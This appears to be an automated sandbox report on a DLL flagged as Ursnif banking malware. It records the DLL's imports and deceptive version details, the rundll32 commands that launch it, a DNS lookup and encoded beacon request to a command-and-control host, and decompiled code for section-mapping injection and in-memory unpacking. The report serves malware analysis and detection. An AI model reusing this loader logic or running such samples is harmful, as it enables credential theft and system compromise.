                                  KERNEL32.dllGetModuleFileNameA, VirtualProtect, GlobalFree, GetCurrentDirectoryA, FileTimeToLocalFileTime, GetVersion, GetTempPathA, CreatePipe, VirtualProtectEx, CreateSemaphoreA, CreateEventA, Sleep, GlobalAlloc, SetErrorMode, GetLocaleInfoA, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, InterlockedCompareExchange, GetCurrentThreadId, GetCommandLineA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameW, HeapValidate, IsBadReadPtr, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, GetCPInfo, GetTimeFormatA, GetDateFormatA, LCMapStringA, GetLastError, LCMapStringW, GetStringTypeW, CompareStringW, CompareStringA, FatalAppExitA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetProcAddress, TlsGetValue, GetModuleHandleW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThread, ExitProcess, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapDestroy, HeapCreate, HeapFree, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetConsoleCtrlHandler, WriteFile, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, GetModuleHandleA, GetTimeZoneInformation, InitializeCriticalSectionAndSpinCount, FreeLibrary, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, GetLocaleInfoW, lstrlenA, CloseHandle, CreateFileA, GetProcessHeap, VirtualQuery, SetEnvironmentVariableA
                                  ADVAPI32.dllCreateServiceA, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegQueryValueExA, RegisterServiceCtrlHandlerA, RegSetValueExA, GetTokenInformation, RegCloseKey, AdjustTokenPrivileges, RegEnumKeyA, ControlService, FreeSid, SetServiceStatus, AllocateAndInitializeSid, RegOpenKeyExA, CloseServiceHandle, OpenProcessToken, StartServiceCtrlDispatcherA, DeleteService, SetEntriesInAclA, LookupPrivilegeValueA
                                  COMDLG32.dllGetSaveFileNameA, CommDlgExtendedError, GetOpenFileNameW, ChooseFontA, ReplaceTextA
                                  COMCTL32.dllImageList_Create, ImageList_GetIcon, ImageList_GetImageCount, ImageList_GetBkColor, ImageList_EndDrag, ImageList_GetDragImage

                                  Exports

                                  NameOrdinalAddress
                                  Surprisefun10x108c7f0

                                  Version Infos

                                  DescriptionData
                                  LegalCopyright 2013 Fractioncomplete Corporation. All rights reserved
                                  InternalNameSmile.dll
                                  FileVersion3.6.8.634
                                  CompanyNameFractioncomplete
                                  Commentshttp://deeplow.ru
                                  ProductNameFractioncomplete Free learn
                                  ProductVersion3.6.8.634
                                  FileDescriptionFree learn
                                  OriginalFilenameSmile.dll
                                  Translation0x0409 0x04b0

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 6, 2021 18:36:15.548310995 CEST4970580192.168.2.334.86.224.8
                                  May 6, 2021 18:36:15.548321962 CEST4970480192.168.2.334.86.224.8
                                  May 6, 2021 18:36:15.673017979 CEST804970434.86.224.8192.168.2.3
                                  May 6, 2021 18:36:15.673166990 CEST4970480192.168.2.334.86.224.8
                                  May 6, 2021 18:36:15.674125910 CEST4970480192.168.2.334.86.224.8
                                  May 6, 2021 18:36:15.674455881 CEST804970534.86.224.8192.168.2.3
                                  May 6, 2021 18:36:15.674573898 CEST4970580192.168.2.334.86.224.8
                                  May 6, 2021 18:36:15.841811895 CEST804970434.86.224.8192.168.2.3
                                  May 6, 2021 18:36:16.425347090 CEST804970434.86.224.8192.168.2.3
                                  May 6, 2021 18:36:16.425525904 CEST4970480192.168.2.334.86.224.8
                                  May 6, 2021 18:36:16.428164005 CEST4970480192.168.2.334.86.224.8
                                  May 6, 2021 18:36:16.551932096 CEST804970434.86.224.8192.168.2.3
                                  May 6, 2021 18:36:18.116828918 CEST4970580192.168.2.334.86.224.8

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 6, 2021 18:34:39.570384026 CEST5935353192.168.2.38.8.8.8
                                  May 6, 2021 18:34:39.619128942 CEST53593538.8.8.8192.168.2.3
                                  May 6, 2021 18:34:40.730128050 CEST5223853192.168.2.38.8.8.8
                                  May 6, 2021 18:34:40.782289028 CEST53522388.8.8.8192.168.2.3
                                  May 6, 2021 18:34:41.563797951 CEST4987353192.168.2.38.8.8.8
                                  May 6, 2021 18:34:41.615484953 CEST53498738.8.8.8192.168.2.3
                                  May 6, 2021 18:34:42.467937946 CEST5319653192.168.2.38.8.8.8
                                  May 6, 2021 18:34:42.520390034 CEST53531968.8.8.8192.168.2.3
                                  May 6, 2021 18:34:43.653125048 CEST5677753192.168.2.38.8.8.8
                                  May 6, 2021 18:34:43.702444077 CEST53567778.8.8.8192.168.2.3
                                  May 6, 2021 18:34:44.613404989 CEST5864353192.168.2.38.8.8.8
                                  May 6, 2021 18:34:44.662230968 CEST53586438.8.8.8192.168.2.3
                                  May 6, 2021 18:34:45.670059919 CEST6098553192.168.2.38.8.8.8
                                  May 6, 2021 18:34:45.718873978 CEST53609858.8.8.8192.168.2.3
                                  May 6, 2021 18:34:46.623615980 CEST5020053192.168.2.38.8.8.8
                                  May 6, 2021 18:34:46.672355890 CEST53502008.8.8.8192.168.2.3
                                  May 6, 2021 18:35:23.546204090 CEST5128153192.168.2.38.8.8.8
                                  May 6, 2021 18:35:23.605609894 CEST53512818.8.8.8192.168.2.3
                                  May 6, 2021 18:35:27.720648050 CEST4919953192.168.2.38.8.8.8
                                  May 6, 2021 18:35:27.770137072 CEST53491998.8.8.8192.168.2.3
                                  May 6, 2021 18:35:28.791017056 CEST5062053192.168.2.38.8.8.8
                                  May 6, 2021 18:35:28.842993975 CEST53506208.8.8.8192.168.2.3
                                  May 6, 2021 18:35:29.852673054 CEST6493853192.168.2.38.8.8.8
                                  May 6, 2021 18:35:29.901518106 CEST53649388.8.8.8192.168.2.3
                                  May 6, 2021 18:35:31.224854946 CEST6015253192.168.2.38.8.8.8
                                  May 6, 2021 18:35:31.273621082 CEST53601528.8.8.8192.168.2.3
                                  May 6, 2021 18:35:32.505561113 CEST5754453192.168.2.38.8.8.8
                                  May 6, 2021 18:35:32.557183027 CEST53575448.8.8.8192.168.2.3
                                  May 6, 2021 18:35:33.408765078 CEST5598453192.168.2.38.8.8.8
                                  May 6, 2021 18:35:33.468740940 CEST53559848.8.8.8192.168.2.3
                                  May 6, 2021 18:35:34.951941013 CEST6418553192.168.2.38.8.8.8
                                  May 6, 2021 18:35:34.997826099 CEST6511053192.168.2.38.8.8.8
                                  May 6, 2021 18:35:35.009131908 CEST53641858.8.8.8192.168.2.3
                                  May 6, 2021 18:35:35.055320024 CEST53651108.8.8.8192.168.2.3
                                  May 6, 2021 18:36:13.719527006 CEST5836153192.168.2.38.8.8.8
                                  May 6, 2021 18:36:13.784255028 CEST53583618.8.8.8192.168.2.3
                                  May 6, 2021 18:36:15.169644117 CEST6349253192.168.2.38.8.8.8
                                  May 6, 2021 18:36:15.521414995 CEST53634928.8.8.8192.168.2.3
                                  May 6, 2021 18:36:43.726162910 CEST6083153192.168.2.38.8.8.8
                                  May 6, 2021 18:36:43.786439896 CEST53608318.8.8.8192.168.2.3
                                  May 6, 2021 18:36:44.726944923 CEST6083153192.168.2.38.8.8.8
                                  May 6, 2021 18:36:44.789702892 CEST53608318.8.8.8192.168.2.3
                                  May 6, 2021 18:36:45.744447947 CEST6083153192.168.2.38.8.8.8
                                  May 6, 2021 18:36:45.796224117 CEST53608318.8.8.8192.168.2.3
                                  May 6, 2021 18:36:47.758946896 CEST6083153192.168.2.38.8.8.8
                                  May 6, 2021 18:36:47.812130928 CEST53608318.8.8.8192.168.2.3
                                  May 6, 2021 18:36:51.774255991 CEST6083153192.168.2.38.8.8.8
                                  May 6, 2021 18:36:51.827344894 CEST53608318.8.8.8192.168.2.3

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  May 6, 2021 18:36:15.169644117 CEST192.168.2.38.8.8.80xa847Standard query (0)green.salurober.comA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  May 6, 2021 18:36:15.521414995 CEST8.8.8.8192.168.2.30xa847No error (0)green.salurober.com34.86.224.8A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • green.salurober.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.34970434.86.224.880C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  TimestampkBytes transferredDirectionData
                                  May 6, 2021 18:36:15.674125910 CEST305OUTGET /egg0bSJn4ObK/ch_2F9lMPXs/fO3mZ53deXfDrA/fFpIrCwIBcA2fafEjJROE/_2FRp0luL60r80DP/FChSncsB8SqrhdJ/_2FXtQYnl2ITaT9OH4/qVdqvFpku/l5Z_2BwlLO28ejlDZ4Xv/ZR0P9bZC7mrWzK2nsLX/wmJroXqHSsCiyywQoJG_2B/ja6fWO6EY6PRe/fsgqsP8a/8D7PMyq0Et_2Bw5od_2BLED/JSk7_2F_2B/ptgvp19MaEwrG0884/hUO8hPN4NRV3/myPEhfLIkFj/6E7GZZkxutBKlj/2G265rer_2FHZz0gfwlBV/vusAOmr1_/2BAGh_2B HTTP/1.1
                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                  Accept-Language: en-US
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Accept-Encoding: gzip, deflate
                                  Host: green.salurober.com
                                  Connection: Keep-Alive
                                  May 6, 2021 18:36:16.425347090 CEST305INHTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Thu, 06 May 2021 16:36:16 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Content-Encoding: gzip
                                  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Start time:18:34:46
                                  Start date:06/05/2021
                                  Path:C:\Windows\System32\loaddll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll'
                                  Imagebase:0x10d0000
                                  File size:116736 bytes
                                  MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389725229.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389658064.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.333514865.0000000000520000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389739083.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.464518953.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389632359.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389705894.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389749777.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389559499.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389608210.0000000003358000.00000004.00000040.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Start time:18:34:46
                                  Start date:06/05/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1
                                  Imagebase:0xbd0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:18:34:46
                                  Start date:06/05/2021
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:rundll32.exe C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll,Surprisefun
                                  Imagebase:0x9b0000
                                  File size:61952 bytes
                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.329940794.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Start time:18:34:46
                                  Start date:06/05/2021
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1
                                  Imagebase:0x9b0000
                                  File size:61952 bytes
                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.329638923.0000000003FE0000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Start time:18:36:13
                                  Start date:06/05/2021
                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                  Imagebase:0x7ff602dd0000
                                  File size:823560 bytes
                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:18:36:13
                                  Start date:06/05/2021
                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5088 CREDAT:17410 /prefetch:2
                                  Imagebase:0xce0000
                                  File size:822536 bytes
                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Executed Functions

                                    C-Code - Quality: 80%
                                    			E6E1D17A7(intOrPtr _a4) {
                                    				char _v28;
                                    				struct _SYSTEMTIME _v44;
                                    				char _v48;
                                    				long _v52;
                                    				long _v56;
                                    				void* __edi;
                                    				long _t21;
                                    				int _t23;
                                    				long _t26;
                                    				long _t27;
                                    				long _t31;
                                    				void* _t37;
                                    				intOrPtr _t39;
                                    				intOrPtr _t44;
                                    				signed int _t45;
                                    				void* _t50;
                                    				signed int _t54;
                                    				void* _t56;
                                    				intOrPtr* _t57;
                                    
                                    				_t21 = E6E1D146C();
                                    				_v52 = _t21;
                                    				if(_t21 != 0) {
                                    					L18:
                                    					return _t21;
                                    				} else {
                                    					goto L1;
                                    				}
                                    				do {
                                    					L1:
                                    					GetSystemTime( &_v44);
                                    					_t23 = SwitchToThread();
                                    					asm("cdq");
                                    					_t45 = 9;
                                    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                    					_t26 = E6E1D15A3(0, _t54); // executed
                                    					_v56 = _t26;
                                    					Sleep(_t54 << 5); // executed
                                    					_t21 = _v56;
                                    				} while (_t21 == 0xc);
                                    				if(_t21 != 0) {
                                    					goto L18;
                                    				}
                                    				_t27 = E6E1D1C12(_t45); // executed
                                    				_v52 = _t27;
                                    				if(_t27 != 0) {
                                    					L16:
                                    					_t21 = _v52;
                                    					if(_t21 == 0xffffffff) {
                                    						_t21 = GetLastError();
                                    					}
                                    					goto L18;
                                    				}
                                    				if(_a4 != 0) {
                                    					L11:
                                    					_push(0);
                                    					_t56 = E6E1D1CA4(E6E1D16EC,  &_v28);
                                    					if(_t56 == 0) {
                                    						_v56 = GetLastError();
                                    					} else {
                                    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                    						_v56 = _t31;
                                    						if(_t31 == 0) {
                                    							GetExitCodeThread(_t56,  &_v56);
                                    						}
                                    						CloseHandle(_t56);
                                    					}
                                    					goto L16;
                                    				}
                                    				if(E6E1D1D7C(_t45,  &_v48) != 0) {
                                    					 *0x6e1d41b8 = 0;
                                    					goto L11;
                                    				}
                                    				_t44 = _v48;
                                    				_t57 = __imp__GetLongPathNameW;
                                    				_t37 =  *_t57(_t44, 0, 0); // executed
                                    				_t50 = _t37;
                                    				if(_t50 == 0) {
                                    					L9:
                                    					 *0x6e1d41b8 = _t44;
                                    					goto L11;
                                    				}
                                    				_t15 = _t50 + 2; // 0x2
                                    				_t39 = E6E1D1C8F(_t50 + _t15);
                                    				 *0x6e1d41b8 = _t39;
                                    				if(_t39 == 0) {
                                    					goto L9;
                                    				} else {
                                    					 *_t57(_t44, _t39, _t50); // executed
                                    					E6E1D136A(_t44);
                                    					goto L11;
                                    				}
                                    			}






















                                    0x6e1d17b3
                                    0x6e1d17bc
                                    0x6e1d17c0
                                    0x6e1d18c8
                                    0x6e1d18ce
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d17c6
                                    0x6e1d17c6
                                    0x6e1d17cb
                                    0x6e1d17d1
                                    0x6e1d17e0
                                    0x6e1d17e1
                                    0x6e1d17e4
                                    0x6e1d17e7
                                    0x6e1d17f0
                                    0x6e1d17f4
                                    0x6e1d17fa
                                    0x6e1d17fe
                                    0x6e1d1805
                                    0x00000000
                                    0x00000000
                                    0x6e1d180b
                                    0x6e1d1812
                                    0x6e1d1816
                                    0x6e1d18b9
                                    0x6e1d18b9
                                    0x6e1d18c0
                                    0x6e1d18c2
                                    0x6e1d18c2
                                    0x00000000
                                    0x6e1d18c0
                                    0x6e1d181f
                                    0x6e1d1872
                                    0x6e1d1872
                                    0x6e1d1883
                                    0x6e1d1887
                                    0x6e1d18b5
                                    0x6e1d1889
                                    0x6e1d188c
                                    0x6e1d1894
                                    0x6e1d1898
                                    0x6e1d18a0
                                    0x6e1d18a0
                                    0x6e1d18a7
                                    0x6e1d18a7
                                    0x00000000
                                    0x6e1d1887
                                    0x6e1d182d
                                    0x6e1d186c
                                    0x00000000
                                    0x6e1d186c
                                    0x6e1d182f
                                    0x6e1d1833
                                    0x6e1d183c
                                    0x6e1d183e
                                    0x6e1d1842
                                    0x6e1d1864
                                    0x6e1d1864
                                    0x00000000
                                    0x6e1d1864
                                    0x6e1d1844
                                    0x6e1d1849
                                    0x6e1d1850
                                    0x6e1d1855
                                    0x00000000
                                    0x6e1d1857
                                    0x6e1d185a
                                    0x6e1d185d
                                    0x00000000
                                    0x6e1d185d

                                    APIs
                                      • Part of subcall function 6E1D146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1D17B8,74B063F0,00000000), ref: 6E1D147B
                                      • Part of subcall function 6E1D146C: GetVersion.KERNEL32 ref: 6E1D148A
                                      • Part of subcall function 6E1D146C: GetCurrentProcessId.KERNEL32 ref: 6E1D1499
                                      • Part of subcall function 6E1D146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1D14B2
                                    • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E1D17CB
                                    • SwitchToThread.KERNEL32 ref: 6E1D17D1
                                      • Part of subcall function 6E1D15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1D15F9
                                      • Part of subcall function 6E1D15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1D17EC), ref: 6E1D168B
                                      • Part of subcall function 6E1D15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1D16A6
                                    • Sleep.KERNELBASE(00000000,00000000), ref: 6E1D17F4
                                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1D183C
                                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1D185A
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1D16EC,?,00000000), ref: 6E1D188C
                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1D18A0
                                    • CloseHandle.KERNEL32(00000000), ref: 6E1D18A7
                                    • GetLastError.KERNEL32(6E1D16EC,?,00000000), ref: 6E1D18AF
                                    • GetLastError.KERNEL32 ref: 6E1D18C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                    • String ID:
                                    • API String ID: 2280543912-0
                                    • Opcode ID: 2902bfb553768ef5fad6197d455ef5258f648e82ed7f64b18c31569fc59f8ce3
                                    • Instruction ID: b091289d621d174322de22b53acd1919daf3ca9cacf77227319901c01551651f
                                    • Opcode Fuzzy Hash: 2902bfb553768ef5fad6197d455ef5258f648e82ed7f64b18c31569fc59f8ce3
                                    • Instruction Fuzzy Hash: 0531D571A05B159BC750DFA5884899F77ECFF86354B204E2AF860C2140E730C9DDEBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,000009B8,00003000,00000040,000009B8,6E2A14B8), ref: 6E2A1B1B
                                    • VirtualAlloc.KERNEL32(00000000,00000145,00003000,00000040,6E2A151A), ref: 6E2A1B52
                                    • VirtualAlloc.KERNEL32(00000000,00015306,00003000,00000040), ref: 6E2A1BB2
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2A1BE8
                                    • VirtualProtect.KERNEL32(6E1D0000,00000000,00000004,6E2A1A40), ref: 6E2A1CED
                                    • VirtualProtect.KERNEL32(6E1D0000,00001000,00000004,6E2A1A40), ref: 6E2A1D14
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2A1A40), ref: 6E2A1DE1
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2A1A40,?), ref: 6E2A1E37
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2A1E53
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.465163344.000000006E2A1000.00000040.00020000.sdmp, Offset: 6E2A1000, based on PE: false
                                    Similarity
                                    • API ID: Virtual$Protect$Alloc$Free
                                    • String ID:
                                    • API String ID: 2574235972-0
                                    • Opcode ID: ca2ef82b0c9608c8ff5b2c8c0fbd3fb87f1736770e9051fdb74c884e49a3ffb0
                                    • Instruction ID: 9cdd8f03d79b90c4b94653527a0fa4b639f4d47de3f74c517df81819a41e45c6
                                    • Opcode Fuzzy Hash: ca2ef82b0c9608c8ff5b2c8c0fbd3fb87f1736770e9051fdb74c884e49a3ffb0
                                    • Instruction Fuzzy Hash: C0D157B61087019FDB15EF58C890F6277B6FF48320B1941A4EE099F35AD770A854EBB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E6E1D18D1(intOrPtr* __eax, void** _a4) {
                                    				int _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				int _v32;
                                    				intOrPtr _v36;
                                    				int _v40;
                                    				int _v44;
                                    				void* _v48;
                                    				void* __esi;
                                    				long _t34;
                                    				void* _t39;
                                    				void* _t47;
                                    				intOrPtr* _t48;
                                    
                                    				_t48 = __eax;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_v24 =  *((intOrPtr*)(__eax + 4));
                                    				_v16 = 0;
                                    				_v12 = 0;
                                    				_v48 = 0x18;
                                    				_v44 = 0;
                                    				_v36 = 0x40;
                                    				_v40 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                    				if(_t34 < 0) {
                                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                    				} else {
                                    					 *_t48 = _v16;
                                    					_t39 = E6E1D1B89(_t48,  &_v12); // executed
                                    					_t47 = _t39;
                                    					if(_t47 != 0) {
                                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                    					} else {
                                    						memset(_v12, 0, _v24);
                                    						 *_a4 = _v12;
                                    					}
                                    				}
                                    				return _t47;
                                    			}


















                                    0x6e1d18da
                                    0x6e1d18e1
                                    0x6e1d18e2
                                    0x6e1d18e3
                                    0x6e1d18e4
                                    0x6e1d18e5
                                    0x6e1d18f6
                                    0x6e1d18fa
                                    0x6e1d190e
                                    0x6e1d1911
                                    0x6e1d1914
                                    0x6e1d191b
                                    0x6e1d191e
                                    0x6e1d1925
                                    0x6e1d1928
                                    0x6e1d192b
                                    0x6e1d192e
                                    0x6e1d1933
                                    0x6e1d196e
                                    0x6e1d1935
                                    0x6e1d1938
                                    0x6e1d193e
                                    0x6e1d1943
                                    0x6e1d1947
                                    0x6e1d1965
                                    0x6e1d1949
                                    0x6e1d1950
                                    0x6e1d195e
                                    0x6e1d195e
                                    0x6e1d1947
                                    0x6e1d1976

                                    APIs
                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 6E1D192E
                                      • Part of subcall function 6E1D1B89: NtMapViewOfSection.NTDLL(00000000,000000FF,6E1D1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E1D1943,?), ref: 6E1D1BB6
                                    • memset.NTDLL ref: 6E1D1950
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Section$CreateViewmemset
                                    • String ID: @
                                    • API String ID: 2533685722-2766056989
                                    • Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                    • Instruction ID: cc175b023f4b33c3cdb754d80572c5dda06bd910c9ea1560ad9728da40e06c1b
                                    • Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                    • Instruction Fuzzy Hash: 2C210EB1E00209AFDB01CFE9C8849DEFBB9EF48354F104829E506F3210D734AA48DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E6E1D1566(void* __ecx) {
                                    				char _v8;
                                    				signed short _t7;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                    				if(_t7 == 0) {
